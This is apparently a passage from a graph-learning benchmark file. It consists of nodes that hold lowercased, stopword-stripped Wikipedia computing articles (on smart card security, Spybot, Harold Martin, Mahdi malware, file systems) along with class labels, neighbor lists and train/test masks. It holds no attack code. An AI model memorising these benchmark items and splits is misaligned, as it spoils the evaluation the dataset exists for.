malware smart card security model may broken malware override communication input via keyboard output via application screen user application man-in-the-browser malware e.g. trojan silentbanker could modify transaction unnoticed user banks like fortis belfius belgium rabobank netherlands combine smart card unconnected card reader avoid problem customer enters challenge received bank website pin transaction amount reader reader returns 8-digit signature signature manually entered personal computer verified bank preventing point-of-sale-malware changing transaction amount smart cards also targets security attacks attacks range physical invasion card electronics non-invasive attacks exploit weaknesses card software hardware usual goal expose private encryption keys read manipulate secure data funds attacker develops non-invasive attack particular smart card model typically able perform attack cards model seconds often using equipment disguised normal smart card reader manufacturers may develop new card models additional information security may costly inconvenient users upgrade vulnerable systems tamper-evident audit features smart card system help manage risks compromised cards another problem lack standards functionality security address problem berlin group launched eridane project propose new functional security framework smart-card based point interaction poi equipment",
    "neighbors": [
      2050,
      6150,
      9744,
      1054,
      32,
      4128,
      9762,
      4644,
      7207,
      3629,
      10801,
      6708,
      1083,
      6203,
      9281,
      7234,
      4679,
      10831,
      10325,
      11349,
      91,
      107,
      7794,
      8839,
      10378,
      4235,
      6797,
      11405,
      4760,
      2215,
      2221,
      2737,
      2228,
      10943,
      7368,
      8904,
      6350,
      10962,
      225,
      229,
      755,
      5373,
      5892,
      1797,
      8978,
      278,
      5918,
      5407,
      3880,
      7983,
      5433,
      7515,
      2403,
      8040,
      2932,
      10110,
      10121,
      1427,
      11175,
      9640,
      426,
      10163,
      1978,
      10685,
      3521,
      7106,
      8645,
      6091,
      5078,
      10207,
      8676,
      1511,
      2027,
      9196,
      11244,
      3572,
      2558,
      2047
    ],
    "mask": "None"
  },
  {
    "node_id": 9746,
    "label": 4,
    "text": "Spybot_–_Search_&_Destroy:spybot – search amp destroy spybot – search destroy spyware adware removal computer program compatible microsoft windows free paid versions dating back first adwares 2000 spybot scans computer hard disk and/or ram malicious software spybot-s written german software engineer patrick michael kolla distributed kolla irish company safer-networking limited development began 2000 kolla still student wrote small program deal aureate/radiate conducent timesink programs two earliest examples adware spybot – search destroy released freeware personal users featureful versions available purchase corporate technician users buy commercial version paid versions contain anti-virus component uses bitdefender engine addition spyware adware detection disinfection spybot-s repair registry winsock lsps activex objects browser hijackers bhos pups http cookies trackerware heavy duty homepage hijackers keyloggers lsp tracks trojans spybots revision kinds malware also delete tracking cookies spybot-s immunize function block installation spyware occurs e.g modifying hosts file secure file deleter included spybot-s originally intended replace compliment anti-virus programs prior v. 2.1 spybot +av detect common trojans rootkits free-standing rootkit finder rootalyzer available programs supplied attached spyware adware refuse run present newer versions spybot replace spyware binaries inert dummies designed fool programs simply check presence spyware file order detect recently created programs efficiently detection updates released weekly improvements added languages better heuristic algorithms updates downloaded installed within software variety mirrors spybot-s available versions windows starting windows 95 supplied translated many languages several skins instructions available website enable users design skins technical support currently supplied means internet forums support e-mails usual response time 24 hours versions spybot-s awards including world class 2003 awards pc magazine editor choice pc user top buy 1 recommended zdnet wall street journal guardian msnbc cnn reviewers although pc magazine initially rated highly 2003 rating declined poor 2008 dismal 2012 improving fair 2014 newer versions program ver 2.2.25 ver 2.4 issued 2014 received 5/5 rating techradar 2018 techradar considered spybot among 4 best anti-malware software available version 1.5 better compatibility previous versions wine software allows running windows programs linux restores compatibility windows 95 faulty 1.4 version 1.6 said safer networking scan several times faster version 1.5 version 2.4 released july 2014 reported 2009 several commercial security products required users uninstall freely available spybot installed run due stated incompatibility memory-resident immunizer teatimer spybot real-time protection application makers spybot-s came conflict norton internet security compatibility issues 2006 symantec recommended uninstalling spybot-s installing norton internet security according safer networking satisfactory explanation provided decision antivirus professional mary landesman suggests possible explanation may stem graphical glitch teatimer module confirmation dialog official explanation safer networking stated error caused bug program used build code result bug users difficulty enabling norton internet security make necessary changes critical registry areas allowing launch computer startup aside mary landesman like safer networking concluded two programs issue one another bug fixed 1.5 release kaspersky anti-virus kaspersky internet security since version 2009 force users uninstall spybot installation process although serious incompatibility yet known discussion concluded kaspersky forum said install spybot kaspersky seems reluctant fix issue despite receiving several complaints incompatibility products might occur spybot tries modify hosts-file selected user immunization kaspersky interpret attempt harmfully manipulate file circumvented immunizing hosts-file spybot trend micro officescan followed norton kaspersky mcafee simply removing spybot without warning notification afterwards immunisation feature spybot – search destroy caused internet explorer 8 start slower expected fix kb969897 resolved problem addressing certain security vulnerabilities issued microsoft 2009 several malicious programs designed look like anti-malware software similar user interfaces program file names actually install spyware programs known rogue antispyware one program spywarebot program known rogue antispyware program fraudulently impersonates various anti-malware software including spybot search destroy however lookalike unlike spybot requires payment",
    "neighbors": [
      8064,
      5636,
      10756,
      6797,
      10392,
      7965,
      9121,
      2213,
      5935,
      7983,
      823,
      7098,
      9791,
      2005,
      3163,
      2783,
      1632,
      877,
      10872,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 9747,
    "label": 5,
    "text": "MH_Message_Handling_System:mh message handling system mh message handling system free open source e-mail client different almost mail reading systems instead single program made several different programs designed work command line provided shell unix-like operating systems another difference rather storing multiple messages single file messages separate file special directory taken together design choices mean easy natural script actions mail messages using normal shell scripting tools descendant mh continues developed name nmh designed unix philosophy mind mh composed separate programs codice_1 view message codice_2 see message titles codice_3 remove messages using codice_4 program possible select messages based sender example programs act different programs run separately different times communication arranged specially information mail currently selected stored files case codice_5 file user mh directory tree mh proposed r. stockton gaines norman shapiro developed bruce s. borden others rand corporation initial version mh created 1979 subsequently development taken marshall t. rose john l. romine working university california irvine last release mh 6.8.4 maintenance patch 6.8.3 release mh public domain nmh new mh current active version mh forked version mh 6.8.3 richard coleman working georgia institute technology incorporates lbl changes made mh late 80s van jacobson mike karels craig leres recent release nmh 1.7.1 march 7th 2018. nmh released bsd license performance mh much dependent file system features operating system runs every read message require starting separate program directory scan large directory file open data even accessed hand mailbox formats mbox use single file often require insertion removal data middle file messages read altered slow procedure cases mh much faster maildir storage format made popular qmail courier mail server improves upon several features first shown mh separate file per message separate directory per mail folder exploitation hardlinks advanced filesystem features improved performance space time mh inherently command line based system graphical interface original program xmh x window system application development xmh ceased similar tool called exmh developed tcl/tk last updated january 7 2004 exmh considered feature-complete little development beyond bug fixes emacs interface mh also provided mh-e project addition dedicated mh clients support mh mailboxes included several clients claws mail novell evolution mutt sylpheed",
    "neighbors": [
      1664,
      9986,
      3465,
      10387,
      5397,
      11418,
      9507,
      9642,
      7983,
      11442,
      1075,
      1844,
      2101,
      9909,
      3015,
      10956,
      6231,
      7255,
      3551,
      9451,
      10861,
      9459,
      3578,
      8443,
      7036
    ],
    "mask": "None"
  },
  {
    "node_id": 9748,
    "label": 9,
    "text": "Next_Byte_Codes:next byte codes next byte codes nbc simple language assembly language syntax used program lego mindstorms nxt programmable bricks command line compiler outputs nxt compatible machine code supported windows mac os linux maintained john hansen mindstorms developer program member nbc compiler released mozilla public license integrated development environment ide bricx command center nbc debugger developed sorosydotcom downloaded freeware",
    "neighbors": [
      219,
      10964,
      477,
      5790
    ],
    "mask": "None"
  },
  {
    "node_id": 9749,
    "label": 9,
    "text": "R._Kent_Dybvig:r. kent dybvig r. kent dybvig professor computer science indiana university bloomington bloomington indiana research focuses programming languages principal developer optimizing chez scheme compiler runtime system initially released 1985 together daniel p. friedman long advocated use scheme language teaching computer science professor emeritus retired indiana university iu join cisco 2011 contributions practical theoretical aspects computing information technology particular design development chez scheme association computing machinery acm named dybvig distinguished member 2006 first year association awarded distinguished ranks",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      6673,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      6767,
      5751,
      7805,
      1159,
      9865,
      9877,
      10395,
      5803,
      2225,
      6834,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      1365,
      3413,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      11221,
      10712,
      3034,
      3051,
      5611,
      7670,
      11255
    ],
    "mask": "Test"
  },
  {
    "node_id": 9750,
    "label": 4,
    "text": "Harold_T._Martin_III:harold t. martin iii harold thomas martin iii born november 1964 former contractor booz allen hamilton accused stealing approximately 50 terabytes data national security agency nsa investigators reportedly difficulty determining martin engaged conventional espionage digital hoarding public reporting indicated united states government agencies apparently failed note effectively respond number issues martin security practices behaviors period 10 20 years martin earned bachelor degree economics math university wisconsin-madison 1989 master degree information systems george mason university 2004 time arrest martin pursuing phd computing university maryland baltimore county research area virtual interfaces exploration heterogeneous cloud computing architectures martin previously worked computer sciences corp tenacity solutions martin worked national security agency 2012 2015 including spending time elite tailored access operations unit albeit support capacity martin previously served surface warfare officer united states navy serving 1987 2000 including aboard uss seattle awarded kuwait liberation medal moved united states navy reserve first received access classified data 2015 still booz allen hamilton contractor transferred department defense office acquisition technology logistics l attempting trace source shadow brokers leak summer 2016 federal bureau investigation fbi alerted nsa internet post made martin allegedly communicated via twitter account hal_999999999 martin used twitter contact russian-based kaspersky lab cyber-security firm turn alerted national security agency federal bureau investigations used information provided kaspersky researchers obtain search warrant martin residence subsequently according united states department justice fbi discovered thousands pages terabytes data classified information martin residence personal vehicle including classified computer code martin reported stolen classified information simply walking secure workplaces possession prosecutors stated stolen classified information includes names covert intelligence officers according indictment martin stole materials central intelligence agency national security agency united states cyber command united states department defense national reconnaissance office according prosecutors evidence martin actually accessed files stole martin charged united states department justice willful retention national defense information martin entered plea guilty october 2016 hearing united states district court district maryland magistrate judge a. david copperthite sided prosecution agreeing martin flight risk would released pending trial fbi failure provide martin miranda warning led u.s. district court judge richard bennett rendering many martin statements inadmissible martin defense attorneys argued suffered mental health issues hoarding symptom martin agreed plead guilty december 2017 scheduled occur january 22 2018 martin pled guilty according court memorandum opinion dated december 3 2018 martin trial date scheduled june 17 2019 march 17 2019 martin agreed plead guilty willful retention national defense information deal called nine years prison three years supervised release fine 250,000 july 19 2019 martin sentenced nine years prison",
    "neighbors": [
      7809,
      10119,
      7887,
      8726,
      8671
    ],
    "mask": "Test"
  },
  {
    "node_id": 9751,
    "label": 9,
    "text": "PL/P:pl/p pl/p programming language acronym programming language prime computers mid-level programming language developed prime computer serve second primary system programming language fortran iv pl/p subset pl/i additions primos operating system prime 50 series computers written mostly pl/p later years certain primos modules written fortran iv primos early years rewritten pl/p pl/p widespread compiled programming language used commercial primos applications outpacing use prime c compiler cpl primos scripting language fortran iv compiler commercial applications",
    "neighbors": [
      4998,
      8262,
      6056,
      6675,
      8502,
      4409,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 9752,
    "label": 2,
    "text": "HiOS_(mobile_operating_system):hios mobile operating system hios customized version android mobile operating system developed hong kong based mobile phone company tecno mobile allows wide range user customization without requiring rooting mobile device operating system also bundled utility applications allow users free memory freeze applications limit data accessibility applications among others devices itel also part hiosu",
    "neighbors": [
      2045,
      8262
    ],
    "mask": "None"
  },
  {
    "node_id": 9753,
    "label": 4,
    "text": "Quantum_Byzantine_agreement:quantum byzantine agreement byzantine fault tolerant protocols algorithms robust arbitrary types failures distributed algorithms advent popularity internet need develop algorithms require centralized control guarantee always working correctly byzantine agreement protocol essential part task article quantum version byzantine protocol works constant time described byzantine agreement protocol protocol distributed computing takes name problem formulated lamport shostak pease 1982 reference historical problem byzantine army divided divisions division led general following properties see proof impossibility result problem usually equivalently restated form commanding general loyal lieutenants general either loyal traitor lieutenants following properties failures algorithm protocol categorized three main types byzantine resilient byzantine fault tolerant protocol algorithm algorithm robust kinds failures mentioned example given space shuttle multiple redundant processors processors give incorrect data processors sets processors believed solution formulated byzantine fault tolerant protocol sketch asynchronous algorithm algorithm works two phases two types coin flipping protocols generate random coin assign integer range 0 n-1 player player allowed choose random id player formula_17 selects random number formula_18 every player formula_19 distributes using verifiable secret sharing scheme end phase players agree secrets properly shared secrets opened player formula_11 assigned value formula_21 requires private information channels replace random secrets superposition formula_22 state encoded using quantum verifiable secret sharing protocol qvss distribute state formula_23 since bad players collapse state prevent bad players encode state using quantum verifiable secret sharing qvss send player share secret verification requires byzantine agreement replacing agreement grade-cast protocol enough grade-cast protocol following properties using definitions informally graded broadcast protocol protocol designated player called “ dealer ” one broadcasts protocol p said achieve graded broadcast beginning protocol designated player called dealer holds value v end protocol every player formula_19 outputs pair formula_25 following properties hold formula_26 formula_38 verification stage qvss protocol guarantees good dealer correct state encoded possibly faulty dealer particular state recovered recovery stage note purpose byzantine quantum coin flip protocol recovery stage much simpler player measures share qvss sends classical value players verification stage guarantees high probability presence formula_38 faulty players good players recover classical value value would result direct measurement encoded state 2007 quantum protocol byzantine agreement demonstrated experimentally using four-photon polarization-entangled state shows quantum implementation classical byzantine agreement protocols indeed feasible",
    "neighbors": [
      11612,
      7085
    ],
    "mask": "Test"
  },
  {
    "node_id": 9754,
    "label": 7,
    "text": "Keynote_Systems:keynote systems keynote systems u.s. based company specialized developing marketing software service technology measure test improve end user perspective performance websites online content applications services across browsers networks mobile devices keynote provided independent testing measurement monitoring mobile content applications services real devices across multiple mobile operator networks keynote systems merged dynatrace june 2015 headquartered san mateo california employing 300 people company went public nasdaq september 24 1999 company internet mobile monitoring products services ran proprietary software measured online business performance viewpoint geographically dispersed user base company claimed corporate customers including american express bp caterpillar disney ebay e*trade expedia microsoft sony ericsson sprint t-mobile verizon vodafone keynote systems founded founded 1995 launched ‘ keynote perspective ’ 1996 launched business 40 internet performance index 1997 globalized internet-performance metrics 1997 secured 4.7 million equity financing keynote releases first ever internet multi-page transactional measurement service 1999. launched streaming perspective product 2000 2001 keynote added google business 40 internet performance index 2002 keynote internetweek ’ ‘ best breed ’ award keynotes named 13th fastest growing north american tech company keynote acquires xaffire ’ insight service suite 2003 company offered buy back 7.5 million shares 33 percent 71.3 million 2004 keynote introduces performance authority email alerts warn public internet threats 2005 keynote zandan announce product-development marketing partnership 2007 keynote joined russell 3000 index keynote ’ voice perspective service named one top 25 innovations 2007 voip news 2008 keynote systems acquires french mobile company zandan keynote launched web site performance index 2008 olympics keynotes introduces kite keynote internet testing environment keynote launched mite mobile internet testing environment – desktop based mobile testing keynote systems gold mobile star award mobile application testing 2009 keynote systems introduces mobile application perspective 3.0 – real time operational monitoring text messaging keynote mite wons jolt product excellence award keynote systems earned ‘ fire ’ ratings forrester keynote releases transaction perspective 9.0 – support monitoring interactive flash silverlight web applications 2011 keynote systems acquired deviceanywhere august 2013 private equity firm thoma bravo acquired keynote systems 395 million june 2015 keynote systems merged dynatrace latter john van siclen acting ceo company acquired 14 companies",
    "neighbors": [
      170,
      467,
      10427
    ],
    "mask": "None"
  },
  {
    "node_id": 9755,
    "label": 2,
    "text": "Message_Maps:message maps message maps microsoft foundation class library message map facility microsoft windows implements polymorphism window classes using messaging facility due large number messages involved providing separate virtual function windows message results prohibitively large vtable mfc provides alternative switch statement used traditional windows programs handle messages sent window mapping messages member-functions may defined message handled window appropriate member function called automatically message-map facility designed similar virtual functions additional benefits possible c++ virtual functions message maps maps user action appropriate mfc class functions handle mfc class handle message member ccmdtarget i.e hierarchically derived ccmdtarget advantage message map action mapped one mfc class function similar handling messages sdk application using wndproc callback functions mfc help oops concepts",
    "neighbors": [
      11574,
      6797,
      10654
    ],
    "mask": "Test"
  },
  {
    "node_id": 9756,
    "label": 2,
    "text": "GEOS_(8-bit_operating_system):geos 8-bit operating system geos graphic environment operating system operating system berkeley softworks later geoworks originally designed commodore 64 version released 1986 enhanced versions geos later became available 1987 commodore 128 1988 apple ii family computers lesser-known version also released commodore plus/4 geos closely resembles early versions classic mac os includes graphical word processor geowrite paint program geopaint december 1987 survey commodore-dedicated magazine compute gazette found nearly half readers used geos many years commodore bundled geos redesigned cost-reduced c64 c64c peak geos third-most-popular microcomputer operating system world terms units shipped trailing ms-dos mac os besides original commodore 64 kernal geos-compatible software packages available berkeley softworks third parties including reasonably sophisticated desktop publishing application called geopublish spreadsheet called geocalc geopublish sophisticated aldus pagemaker geocalc sophisticated microsoft excel packages provide reasonable functionality berkeley softworks founder brian dougherty claimed company ran business using software commodore 8-bit computers several years written group programmers geos design team jim defrisco dave durran michael farr doug fults chris hawley clayton jung tony requist led dougherty cut teeth limited-resource video game machines atari 2600 geos revered could accomplish machines 64–128 kb ram memory 1–2 mhz 8-bit processing power unlike many pieces proprietary software c64 c128 geos takes full advantage many add-ons improvements available systems commodore 1351 mouse supported geos various ram expansion units geos 128 also fully supports c128 640×200 high-resolution vdc display mode compatible rgb monitor c64 version geos incorporates built-in fast loader called diskturbo significantly increases speed drive access slow 1541 geos first commodore software could use floppy disk swap space virtual memory geos 128 take advantage c128 enhanced burst mode conjunction 1571 1581 drives commodore version geos uses copy protection scheme renders users disks unbootable detects disk illegally duplicated via berkeley special geocable interface converter third-party interfaces connect standard rs-232 centronics printers commodore serial bus geos supports wide variety printers including hp pcl printers apple laserwriter ability print high-end printers major factor making geos desktop publishing platform apple ii version geos released freeware august 2003 commodore 64/128 versions followed february 2004 latest geos desktop suite ibm pc compatibles breadbox ensemble revivals seen omnigo handhelds brother geobook line laptop-appliances newdeal office package pcs related code found way earlier zoomer pdas creating unclear lineage palm inc. later work nokia used geos base operating system nokia communicator series switching epoc symbian august 19 2016 michael steil posted blog source code geos 2.0 commodore c64 fully reverse-engineered cc65 compiler suite reverse-engineered source code made available github dozens official third-party applications products produced geos among important popular following",
    "neighbors": [
      576,
      2179,
      5384,
      8136,
      9549,
      9166,
      7983,
      6675,
      11539,
      4764
    ],
    "mask": "Test"
  },
  {
    "node_id": 9757,
    "label": 5,
    "text": "Firefox_2:firefox 2 mozilla firefox 2 version firefox web browser released october 24 2006 mozilla corporation firefox 2 uses version 1.8 gecko layout engine displaying web pages release contained many new features found firefox 1.5 including improved support scalable vector graphics svg javascript 1.7 well user interface changes march 22 2006 first alpha version firefox 2 bon echo alpha 1 released featured gecko 1.8.1 first time mozilla firefox 2.0.0.x final version officially supported windows nt 4.0 windows 98 windows although run windows 95 windows nt 3.51 using tweaks mac os x 10.5 support added october 18 2007 version 2.0.0.8 firefox 2.0 featured updates tabbed browsing environment extensions manager gui find search software update engines new session restore feature inline spell checking anti-phishing feature implemented google extension later merged program mozilla ended support firefox 2 december 18 2008 one article noted release firefox 2.0 october 2006 ie6 lion share browser market 77.22 internet explorer 7 climbed 3.18 firefox 2.0 0.69 softpedia article however noted july 2007 firefox 2.0 also expanding share constantly spite ie7 0.69 october 2006 firefox 2.0 accounting 11.07 market mozilla even sacrificed version 1.5 open source browser firefox 2.0 support cut end june firefox 1.5 dropped 2.85 firefox 2 began lose notable market share firefox 3 within 24 hours release firefox 3 usage rose 1 3 according net applications time period firefox 2 market share consistently dropped eventually surpassed firefox 3 2008 firefox 3.5 2009 general browser market firefox version greatest share early 2009 dropped 3 percent firefox 2.x end-of-lifed december 2008 roughly 26 months support firefox 3.6 supported longer gecko 1.8.1 browser core continued receive patches projects camino k-meleon seamonkey even official firefox releases ceased 2011 1.8.1 core become obsolete major websites dropped support employing newer technologies presentation complex scripting latter resource-intensive older core users stuck use noscript avoid problems scripts take long process cost losing site features beyond basic functionality services large user bases relegated browsers gecko 1.8.1 rendering engine using lightweight mobile versions sites alongside recommendations upgrade browser others recommend upgrade nevertheless still large number websites freely usable navigable firefox 2.0 equivalents alone many must still support older browsers like internet explorer 6 ie7",
    "neighbors": [
      6657,
      9736,
      2579,
      6171,
      7713,
      3110,
      10791,
      9770,
      559,
      9780,
      4661,
      3639,
      9275,
      64,
      9281,
      5707,
      10834,
      6231,
      8281,
      6747,
      1642,
      9834,
      10860,
      4722,
      115,
      9843,
      3191,
      119,
      4728,
      10872,
      637,
      1664,
      641,
      6791,
      6797,
      2196,
      11418,
      10910,
      8351,
      7340,
      1713,
      3250,
      9908,
      7861,
      185,
      11449,
      4797,
      7364,
      11466,
      7885,
      7889,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      8443,
      9983,
      7943,
      1295,
      1807,
      7951,
      2836,
      3350,
      10006,
      7965,
      1834,
      7983,
      823,
      10057,
      10060,
      2893,
      10078,
      11112,
      8557,
      7543,
      3961,
      6528,
      3971,
      3462,
      8584,
      6028,
      7572,
      2462,
      5026,
      3496,
      5054,
      10174,
      9152,
      4048,
      5078,
      482,
      10722,
      5605,
      487,
      8169,
      4074,
      5612,
      494,
      1520,
      7152,
      6133,
      5114,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 9758,
    "label": 4,
    "text": "Sparrowiq:sparrowiq sparrowiq packet-based traffic analysis network performance monitoring solution provides network managers near real-time traffic visibility network usage based conversations applications users class service product developed solana networks ottawa ontario canada allow smaller businesses gain access flow-based network traffic monitoring solutions normally complex unaffordable sparrowiq awarded best new product ascii group june 2015 strong value award enterprise management associates 2013 sparrowiq key features",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 9759,
    "label": 2,
    "text": "VAXELN:vaxeln vaxeln discontinued real-time operating system vax family computers produced digital equipment corporation dec maynard massachusetts rsx-11 vms dave cutler principal force behind development operating system cutler team developed product moving seattle washington area form decwest engineering group dec first engineering group outside new england initial target platforms vaxeln backplane interconnect computers model code-named scorpio time vax microcomputers vaxeln well way cutler spearheaded next project microvax -- first vax microcomputer although low-volume product compared new england-developed microvax ii microvax demonstrated set architectural decisions needed support single-board implementation vax computer family also provided platform embedded applications written vaxeln vaxeln team made decision first release use pascal language system programming language languages including c supported later releases system small focused development team built first product approximately 18 months vaxeln allowed developer write self-contained embedded system application would run vax later microvax hardware operating system present system debuted las vegas early 1980s variety amusing applications written development team ranging system composed played minuets robotic system played solved tower hanoi puzzle system originally supposed named elan executive local area network dec discovered last minute trademarked european country dec wished conduct business company holding trademark elan slovenian sports equipment manufacturer elan order avoid litigation dec quickly renamed vaxeln dropping much disgruntlement developers documentation marketing material already printed referring product elan samples posters prized many years members original team",
    "neighbors": [
      1804,
      273,
      9366,
      7076,
      8876,
      7983,
      6448,
      6837,
      6846,
      3650,
      8262,
      2507,
      8524,
      11604,
      10590,
      1253,
      10475,
      5363,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9760,
    "label": 2,
    "text": "Soyombo_Linux:soyombo linux soyombo project based mongolian republic aimed create mongolian language distribution linux full support writing mongolian cyrillic traditional scripts mongolian including soyombo script clear script classical mongolian script discontinued",
    "neighbors": [
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 9761,
    "label": 4,
    "text": "Mahdi_(malware):mahdi malware mahdi computer malware initially discovered february 2012 reported july year according kaspersky lab seculert israeli security firm discovered malware software used targeted cyber espionage since december 2011 infecting least 800 computers iran middle eastern countries mahdi named files used malware refers muslim figure",
    "neighbors": [
      1024,
      3072,
      5636,
      10245,
      10756,
      9233,
      4117,
      8726,
      535,
      4644,
      4133,
      9256,
      3116,
      3643,
      7739,
      9791,
      1088,
      4165,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      107,
      10875,
      5245,
      3711,
      8320,
      7809,
      6786,
      5764,
      2187,
      9356,
      4240,
      150,
      1688,
      10392,
      1690,
      2717,
      9375,
      5281,
      2213,
      9904,
      9395,
      8886,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      4344,
      3320,
      7418,
      4863,
      2815,
      1279,
      3843,
      10502,
      8978,
      4883,
      10003,
      278,
      3867,
      8998,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      3395,
      6484,
      857,
      1882,
      7515,
      3941,
      877,
      3956,
      9082,
      7044,
      11152,
      10132,
      10141,
      1440,
      5024,
      5028,
      11175,
      939,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      6588,
      9664,
      8133,
      2508,
      4054,
      7639,
      8664,
      1504,
      9186,
      2542,
      2041,
      507
    ],
    "mask": "None"
  },
  {
    "node_id": 9762,
    "label": 6,
    "text": "File_system:file system computing file system filesystem often abbreviated fs controls data stored retrieved without file system information placed storage medium would one large body data way tell one piece information stops next begins separating data pieces giving piece name information easily isolated identified taking name way paper-based information systems named group data called file structure logic rules used manage groups information names called file system many different kinds file systems one different structure logic properties speed flexibility security size file systems designed used specific applications example iso 9660 file system designed specifically optical discs file systems used numerous different types storage devices use different kinds media 2019 hard disk drives key storage devices projected remain foreseeable future kinds media used include ssds magnetic tapes optical discs cases tmpfs computer main memory random-access memory ram used create temporary file system short-term use file systems used local data storage devices others provide file access via network protocol example nfs smb 9p clients file systems virtual meaning supplied files called virtual files computed request procfs sysfs merely mapping different file system used backing store file system manages access content files metadata files responsible arranging storage space reliability efficiency tuning regard physical storage medium important design considerations advent computers term file system used describe method storing retrieving paper documents 1961 term applied computerized filing alongside original meaning 1964 general use file system consists two three layers sometimes layers explicitly separated sometimes functions combined logical file system responsible interaction user application provides application program interface api file operations — codice_1 codice_2 codice_3 etc. passes requested operation layer processing logical file system manage open file table entries per-process file descriptors layer provides file access directory operations security protection second optional layer virtual file system interface allows support multiple concurrent instances physical file systems called file system implementation third layer physical file system layer concerned physical operation storage device e.g disk processes physical blocks read written handles buffering memory management responsible physical placement blocks specific locations storage medium physical file system interacts device drivers channel drive storage device note applies file systems used storage devices file systems allocate space granular manner usually multiple physical units device file system responsible organizing files directories keeping track areas media belong file used example apple dos early 1980s 256-byte sectors 140 kilobyte floppy disk used track/sector map results unused space file exact multiple allocation unit sometimes referred slack space 512-byte allocation average unused space 256 bytes 64 kb clusters average unused space 32 kb size allocation unit chosen file system created choosing allocation size based average size files expected file system minimize amount unusable space frequently default allocation may provide reasonable usage choosing allocation size small results excessive overhead file system contain mostly large files file system fragmentation occurs unused space single files contiguous file system used files created modified deleted file created file system allocates space data file systems permit require specifying initial space allocation subsequent incremental allocations file grows files deleted space allocated eventually considered available use files creates alternating used unused areas various sizes free space fragmentation file created area contiguous space available initial allocation space must assigned fragments file modified becomes larger may exceed space initially allocated another allocation must assigned elsewhere file becomes fragmented operating systems system administrator may use disk quotas limit allocation disk space filename file name used identify storage location file system file systems restrictions length filenames file systems filenames case sensitive i.e. names codice_4 codice_5 refer file others filenames case sensitive i.e. names codice_4 codice_7 codice_5 refer three separate files modern file systems allow filenames contain wide range characters unicode character set however may restrictions use certain special characters disallowing within filenames characters might used indicate device device type directory prefix file path separator file type file systems typically directories also called folders allow user group files separate collections may implemented associating file name index table contents inode unix-like file system directory structures may flat i.e linear allow hierarchies directories may contain subdirectories first file system support arbitrary hierarchies directories used multics operating system native file systems unix-like systems also support arbitrary directory hierarchies example apple hierarchical file system successor hfs+ classic mac os fat file system ms-dos 2.0 later versions ms-dos microsoft windows ntfs file system windows nt family operating systems ods-2 on-disk structure-2 higher levels files-11 file system openvms bookkeeping information typically associated file within file system length data contained file may stored number blocks allocated file byte count time file last modified may stored file timestamp file systems might store file creation time time last accessed time file metadata changed time file last backed information include file device type e.g block character socket subdirectory etc owner user id group id access permissions file attributes e.g whether file read-only executable etc. file system stores metadata associated file—including file name length contents file location file folder hierarchy—separate contents file file systems store names files one directory one place—the directory table directory—which often stored like file many file systems put metadata file directory table rest metadata file completely separate structure inode file systems also store metadata associated one particular file metadata includes information unused regions—free space bitmap block availability map—and information bad sectors often information allocation group stored inside allocation group additional attributes associated file systems ntfs xfs ext2 ext3 versions ufs hfs+ using extended file attributes file systems provide user defined attributes author document character encoding document size image file systems allow different data collections associated one file name separate collections may referred streams forks apple long used forked file system macintosh microsoft supports streams ntfs file systems maintain multiple past revisions file single file name filename retrieves recent version prior saved version accessed using special naming convention filename 4 filename -4 access version four saves ago see comparison file systems metadata details file systems support kinds metadata cases file system may make use storage device used organize represent access data whether stored dynamically generated e.g procfs file systems include utilities initialize alter parameters remove instance file system include ability extend truncate space allocated file system directory utilities may used create rename delete directory entries also known dentries singular dentry alter metadata associated directory directory utilities may also include capabilities create additional links directory hard links unix rename parent links .. unix-like operating systems create bidirectional links files file utilities create list copy move delete files alter metadata may able truncate data truncate extend space allocation append move modify files in-place depending underlying structure file system may provide mechanism prepend truncate beginning file insert entries middle file delete entries file utilities free space deleted files file system provides undelete function also belong category file systems defer operations reorganization free space secure erasing free space rebuilding hierarchical structures providing utilities perform functions times minimal activity example file system defragmentation utilities important features file system utilities involve supervisory activities may involve bypassing ownership direct access underlying device include high-performance backup recovery data replication reorganization various data structures allocation tables within file system several mechanisms used file systems control access data usually intent prevent reading modifying files user group users another reason ensure data modified controlled way access may restricted specific program examples include passwords stored metadata file elsewhere file permissions form permission bits access control lists capabilities need file system utilities able access data media level reorganize structures provide efficient backup usually means effective polite users effective intruders methods encrypting file data sometimes included file system effective since need file system utilities know encryption seed effectively manage data risks relying encryption include fact attacker copy data use brute force decrypt data losing seed means losing data one significant responsibility file system ensure regardless actions programs accessing data structure remains consistent includes actions taken program modifying data terminates abnormally neglects inform file system completed activities may include updating metadata directory entry handling data buffered yet updated physical storage media failures file system must deal include media failures loss connection remote systems event operating system failure soft power failure special routines file system must invoked similar individual program fails file system must also able correct damaged structures may occur result operating system failure os unable notify file system power failure reset file system must also record events allow analysis systemic issues well problems specific files directories important purpose file system manage user data includes storing retrieving updating data file systems accept data storage stream bytes collected stored manner efficient media program retrieves data specifies size memory buffer file system transfers data media buffer runtime library routine may sometimes allow user program define record based library call specifying length user program reads data library retrieves data via file system returns record file systems allow specification fixed record length used writes reads facilitates locating n record well updating records identification record also known key makes sophisticated file system user program read write update records without regard location requires complicated management blocks media usually separating key blocks data blocks efficient algorithms developed pyramid structure locating records utilities language specific run-time libraries user programs use file system 